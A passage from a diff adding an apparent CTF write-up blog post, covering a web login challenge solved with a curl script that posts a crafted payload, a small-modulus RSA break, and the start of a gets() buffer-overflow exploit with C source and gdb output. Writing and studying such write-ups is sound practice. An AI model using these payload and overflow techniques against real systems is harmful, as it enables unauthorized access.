+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     crypto
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     .
+    &lt;/span&gt;
+    &lt;span class="token property-access"&gt;
+     randomUUID
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     .
+    &lt;/span&gt;
+    &lt;span class="token method function property-access"&gt;
+     toString
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     'utf-8'
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+   &lt;/code&gt;
+  &lt;/div&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  I made a simple shell script that calls cURL with the base64-encoded
+parameters, and decodes the url-encoded flag afterwards:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;div class="prismjs"&gt;
+   &lt;code class="language-sh" style="white-space:pre"&gt;
+    &lt;span class=""&gt;
+     #!/bin/sh
+    &lt;/span&gt;
+    &lt;!-- --&gt;
+    # https://stackoverflow.com/questions/6250698/how-to-decode-url-encoded-string-in-shell
+    &lt;!-- --&gt;
+    function urldecode() { : "${*//+/ }"; echo -e "${_//%/\\x}"; }
+    &lt;!-- --&gt;
+    &lt;!-- --&gt;
+    urldecode $(curl -sX POST \
+    &lt;!-- --&gt;
+    -d "username=$(printf 'admin' | base64)" \
+    &lt;!-- --&gt;
+    -d "password=$(cat ./randomUUID.js)" \
+    &lt;!-- --&gt;
+    https://secure.mc.ax/login)
+   &lt;/code&gt;
+  &lt;/div&gt;
+ &lt;/pre&gt;
+ &lt;h3 id="cryptobaby"&gt;
+  crypto/baby
+ &lt;/h3&gt;
+ &lt;blockquote&gt;
+  &lt;p&gt;
+   I want to do an RSA!
+  &lt;/p&gt;
+ &lt;/blockquote&gt;
+ &lt;p&gt;
+  This challenge is breaking RSA. It only works because the
+  &lt;code&gt;
+   n
+  &lt;/code&gt;
+  parameter is
+really small.
+ &lt;/p&gt;
+ &lt;p&gt;
+  Googling for 'rsa decrypt n e c' yields
+  &lt;a href="https://stackoverflow.com/questions/49878381/rsa-decryption-using-only-n-e-and-c"&gt;
+   this
+  &lt;/a&gt;
+  stackoverflow result, which links to
+  &lt;a href="https://www.dcode.fr/rsa-cipher"&gt;
+   dcode.fr
+  &lt;/a&gt;
+  . The only thing left to do is
+calculate
+  &lt;code&gt;
+   p
+  &lt;/code&gt;
+  and
+  &lt;code&gt;
+   q
+  &lt;/code&gt;
+  , which can be done using
+  &lt;a href="https://wolframalpha.com/"&gt;
+   wolfram
+alpha
+  &lt;/a&gt;
+  .
+ &lt;/p&gt;
+ &lt;h3 id="pwnbeginner-generic-pwn-number-0"&gt;
+  pwn/beginner-generic-pwn-number-0
+ &lt;/h3&gt;
+ &lt;blockquote&gt;
+  &lt;p&gt;
+   rob keeps making me write beginner pwn! i'll show him...
+  &lt;/p&gt;
+  &lt;p&gt;
+   &lt;code&gt;
+    nc mc.ax 31199
+   &lt;/code&gt;
+  &lt;/p&gt;
+ &lt;/blockquote&gt;
+ &lt;p&gt;
+  This was my first interaction with
+  &lt;code&gt;
+   gdb
+  &lt;/code&gt;
+  . It was.. painful. After begging for
+help in the redpwnCTF discord server about another waaaay harder challenge, an
+organizer named asphyxia pointed me towards
+  &lt;a href="https://github.com/hugsy/gef"&gt;
+   gef
+  &lt;/a&gt;
+  which single-handedly saved my sanity during the binary exploitation
+challenges.
+ &lt;/p&gt;
+ &lt;p&gt;
+  The first thing I did was use
+  &lt;a href="https://github.com/radareorg/iaito"&gt;
+   iaito
+  &lt;/a&gt;
+  to
+look at a dissassembly graph of the binary. Iaito is a graphical frontend to
+the radare2 reverse engineering framework, and I didn't feel like learning two
+things at the same time, so that's why I used it. While it's very
+user-friendly, I didn't look into reverse engineering tools very much, and
+didn't realise that iaito is still in development. Let's just say I ran into
+some issues with project saving so I took lots of unnecessary repeated steps.
+ &lt;/p&gt;
+ &lt;p&gt;
+  After trying to make sense of assembly code after just seeing it for the first
+time, I instead decided looking at the source code would be a better idea since
+I actually know c.
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;div class="prismjs"&gt;
+   &lt;code class="language-c" style="white-space:pre"&gt;
+    &lt;span class="token macro property directive-hash"&gt;
+     #
+    &lt;/span&gt;
+    &lt;span class="token macro property directive keyword"&gt;
+     include
+    &lt;/span&gt;
+    &lt;span class="token macro property"&gt;
+    &lt;/span&gt;
+    &lt;span class="token macro property string"&gt;
+     &lt;stdio.h&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token macro property directive-hash"&gt;
+     #
+    &lt;/span&gt;
+    &lt;span class="token macro property directive keyword"&gt;
+     include
+    &lt;/span&gt;
+    &lt;span class="token macro property"&gt;
+    &lt;/span&gt;
+    &lt;span class="token macro property string"&gt;
+     &lt;string.h&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token macro property directive-hash"&gt;
+     #
+    &lt;/span&gt;
+    &lt;span class="token macro property directive keyword"&gt;
+     include
+    &lt;/span&gt;
+    &lt;span class="token macro property"&gt;
+    &lt;/span&gt;
+    &lt;span class="token macro property string"&gt;
+     &lt;stdlib.h&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     const
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     char
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     *
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     inspirational_messages
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     [
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ]
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     {
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     "\"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨\""
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     "\"𝘱𝘭𝘦𝘢𝘴𝘦 𝘸𝘳𝘪𝘵𝘦 𝘢 𝘱𝘸𝘯 𝘴𝘰𝘮𝘦𝘵𝘪𝘮𝘦 𝘵𝘩𝘪𝘴 𝘸𝘦𝘦𝘬\""
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     "\"𝘮𝘰𝘳𝘦 𝘵𝘩𝘢𝘯 1 𝘸𝘦𝘦𝘬 𝘣𝘦𝘧𝘰𝘳𝘦 𝘵𝘩𝘦 𝘤𝘰𝘮𝘱𝘦𝘵𝘪𝘵𝘪𝘰𝘯\""
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     }
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     int
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     main
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     void
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     {
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     srand
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     time
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     0
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     long
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     inspirational_message_index
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     rand
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     %
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     sizeof
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     inspirational_messages
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     /
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     sizeof
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     char
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     *
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     char
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     heartfelt_message
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     [
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     32
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ]
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     setbuf
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token constant"&gt;
+     stdout
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token constant"&gt;
+     NULL
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     setbuf
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token constant"&gt;
+     stdin
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token constant"&gt;
+     NULL
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     setbuf
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token constant"&gt;
+     stderr
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token constant"&gt;
+     NULL
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     puts
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     inspirational_messages
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     [
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     inspirational_message_index
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ]
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     puts
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     "rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!"
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     puts
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     "can you write me a heartfelt message to cheer me up? :("
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     gets
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     heartfelt_message
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     if
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     inspirational_message_index
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     ==
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     -
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     1
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     {
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     system
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     "/bin/sh"
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     }
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     }
+    &lt;/span&gt;
+   &lt;/code&gt;
+  &lt;/div&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  After looking at this source things became a lot clearer, because the only
+input you can actually control is recieved from
+  &lt;code&gt;
+   gets(...);
+  &lt;/code&gt;
+ &lt;/p&gt;
+ &lt;p&gt;
+  Now comes the hard part: doing it, but in assembly!
+ &lt;/p&gt;
+ &lt;p&gt;
+  Some recources you should consume before attempting binary exploitation would
+be
+  &lt;a href="https://www.youtube.com/watch?v=1S0aBV-Waeo"&gt;
+   computerphile's video on buffer
+overflows
+  &lt;/a&gt;
+  and
+  &lt;a href="https://cheat.sh/gdb"&gt;
+   cheat.sh/gdb
+  &lt;/a&gt;
+  for some basic gdb commands. The rest of
+this section assumes you know the basics of both buffer overflows and gdb.
+ &lt;/p&gt;
+ &lt;p&gt;
+  First, let's print a dissassembly of the
+  &lt;code&gt;
+   int main()
+  &lt;/code&gt;
+  function:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;code&gt;
+   (gdb) disas main
+Dump of assembler code for function main:
+   0x000000000040127c &lt;+134&gt;:   call   0x4010a0 &lt;puts@plt&gt;
+   0x0000000000401281 &lt;+139&gt;:   lea    rdi,[rip+0xec8]        # 0x402150
+   0x0000000000401288 &lt;+146&gt;:   call   0x4010a0 &lt;puts@plt&gt;
+   0x000000000040128d &lt;+151&gt;:   lea    rdi,[rip+0xf1c]        # 0x4021b0
+   0x0000000000401294 &lt;+158&gt;:   call   0x4010a0 &lt;puts@plt&gt;
+   0x0000000000401299 &lt;+163&gt;:   lea    rax,[rbp-0x30]
+   0x000000000040129d &lt;+167&gt;:   mov    rdi,rax
+   0x00000000004012a0 &lt;+170&gt;:   call   0x4010f0 &lt;gets@plt&gt;
+   0x00000000004012a5 &lt;+175&gt;:   cmp    QWORD PTR [rbp-0x8],0xffffffffffffffff
+   0x00000000004012aa &lt;+180&gt;:   jne    0x4012b8 &lt;main+194&gt;
+   0x00000000004012ac &lt;+182&gt;:   lea    rdi,[rip+0xf35]        # 0x4021e8
+   0x00000000004012b3 &lt;+189&gt;:   call   0x4010c0 &lt;system@plt&gt;
+   0x00000000004012b8 &lt;+194&gt;:   mov    eax,0x0
+   0x00000000004012bd &lt;+199&gt;:   leave
+   0x00000000004012be &lt;+200&gt;:   ret
+End of assembler dump.
+  &lt;/code&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  This isn't the full output from gdb, but only the last few lines. A few things
+should immediately stand out: the 3
+  &lt;code&gt;
+   &lt;puts@plt&gt;
+  &lt;/code&gt;
+  calls, and right after the
+call to
+  &lt;code&gt;
+   &lt;gets@plt&gt;
+  &lt;/code&gt;
+  . These are the assembly equivalent of:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;div class="prismjs"&gt;
+   &lt;code class="language-c" style="white-space:pre"&gt;
+    &lt;span class="token function"&gt;
+     puts
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     inspirational_messages
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     [
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     inspirational_message_index
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ]
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     puts
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     "rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!"
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     puts
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     "can you write me a heartfelt message to cheer me up? :("
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     gets
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     heartfelt_message
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+   &lt;/code&gt;
+  &lt;/div&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  Since I didn't see any reference to a flag file being read, I assumed that the
+  &lt;code&gt;
+   system("/bin/sh")
+  &lt;/code&gt;
+  call is our main target, so let's see if we can find that
+in our assembly code. There's a call to
+  &lt;code&gt;
+   &lt;system@plt&gt;
+  &lt;/code&gt;
+  at
+  &lt;code&gt;
+   &lt;main+189&gt;
+  &lt;/code&gt;
+  , and
+there's other weird
+  &lt;code&gt;
+   cmp
+  &lt;/code&gt;
+  ,
+  &lt;code&gt;
+   jne
+  &lt;/code&gt;
+  and
+  &lt;code&gt;
+   lea
+  &lt;/code&gt;
+  instructions before. Let's figure
+out what those do!
+ &lt;/p&gt;
+ &lt;p&gt;
+  After some stackoverflow soul searching, I found out that the
+  &lt;code&gt;
+   cmp
+  &lt;/code&gt;
+  and
+  &lt;code&gt;
+   jne
+  &lt;/code&gt;
+  are assembly instructions for compare, and jump-if-not-equal. They work like
+this:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;div class="prismjs"&gt;
+   &lt;code class="language-asm6502" style="white-space:pre"&gt;
+    &lt;span class="token comment"&gt;
+     ;  cmp compares what's in the $rbp register to 0xffffffffffffffff
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token comment"&gt;
+     ;  and turns on the ZERO flag if they're equal
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     0x004012a5 &lt;+
+    &lt;/span&gt;
+    &lt;span class="token decimalnumber string"&gt;
+     0
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     &gt;:
+    &lt;/span&gt;
+    &lt;span class="token opcode property"&gt;
+     cmp
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     QWORD PTR [rbp-0x8],0xffffffffffffffff
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token comment"&gt;
+     ;  jne checks if the ZERO flag is on,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token comment"&gt;
+     ;  and if it is it jumps (in this case) to 0x4012b8
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     ┌--0x004012aa &lt;+
+    &lt;/span&gt;
+    &lt;span class="token decimalnumber string"&gt;
+     1
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     &gt;:  jne    0x4012b8 &lt;main+
+    &lt;/span&gt;
+    &lt;span class="token decimalnumber string"&gt;
+     194
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     &gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     │
+    &lt;/span&gt;
+    &lt;span class="token comment"&gt;
+     ; we can safely ignore the `lea` instruction as it doesn't impact our pwn
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     │  0x004012ac &lt;+
+    &lt;/span&gt;
+    &lt;span class="token decimalnumber string"&gt;
+     2
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     &gt;:  lea    rdi,[rip+0xf35]        # 0x4021e8
+    &lt;/span&gt;
+    │
+    &lt;span class=""&gt;
+     │
+    &lt;/span&gt;
+    &lt;span class="token comment"&gt;
+     ; the almighty syscall
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     │  0x004012b3 &lt;+
+    &lt;/span&gt;
+    &lt;span class="token decimalnumber string"&gt;
+     3
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     &gt;:  call   0x4010c0 &lt;system@plt&gt;
+    &lt;/span&gt;
+    │
+    &lt;span class=""&gt;
+     │
+    &lt;/span&gt;
+    &lt;span class="token comment"&gt;
+     ; from here on the program exits without calling /bin/sh
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     └-&gt;0x004012b8 &lt;+
+    &lt;/span&gt;
+    &lt;span class="token decimalnumber string"&gt;
+     4
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     &gt;:  mov    eax,0x0
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     0x004012bd &lt;+
+    &lt;/span&gt;
+    &lt;span class="token decimalnumber string"&gt;
+     5
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     &gt;:  leave
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     0x004012be &lt;+
+    &lt;/span&gt;
+    &lt;span class="token decimalnumber string"&gt;
+     6
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     &gt;:  ret
+    &lt;/span&gt;
+   &lt;/code&gt;
+  &lt;/div&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  The program checks if there's
+  &lt;code&gt;
+   0xffffffffffffffff
+  &lt;/code&gt;
+  in memory
+  &lt;code&gt;
+   0x8
+  &lt;/code&gt;
+  bytes before
+the
+  &lt;code&gt;
+   $rbp
+  &lt;/code&gt;
+  register. The program allocates 32 bytes of memory for our heartfelt
+message, but it continues reading even if our heartfelt message is longer than
+32 bytes. Let's see if we can overwrite that register &gt;:)
+ &lt;/p&gt;
+ &lt;p&gt;
+  Let's set a breakpoint after the
+  &lt;code&gt;
+   &lt;gets@plt&gt;
+  &lt;/code&gt;
+  call in gdb, and run the program
+with 40 bytes of
+  &lt;code&gt;
+   0x61
+  &lt;/code&gt;
+  ('a')
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;code&gt;
+   (gdb) break *0x00000000004012a5
+Breakpoint 1 at 0x4012a5
+
+(gdb) run &lt; &lt;(python3 -c "print('a' * 40)")
+  &lt;/code&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  I'm using the
+  &lt;code&gt;
+   run
+  &lt;/code&gt;
+  command with
+  &lt;code&gt;
+   &lt;
+  &lt;/code&gt;
+  and
+  &lt;code&gt;
+   &lt;()
+  &lt;/code&gt;
+  to pipe the output of python
+into the program's
+  &lt;code&gt;
+   stdin
+  &lt;/code&gt;
+  . It's unnecessary at this stage because there's an
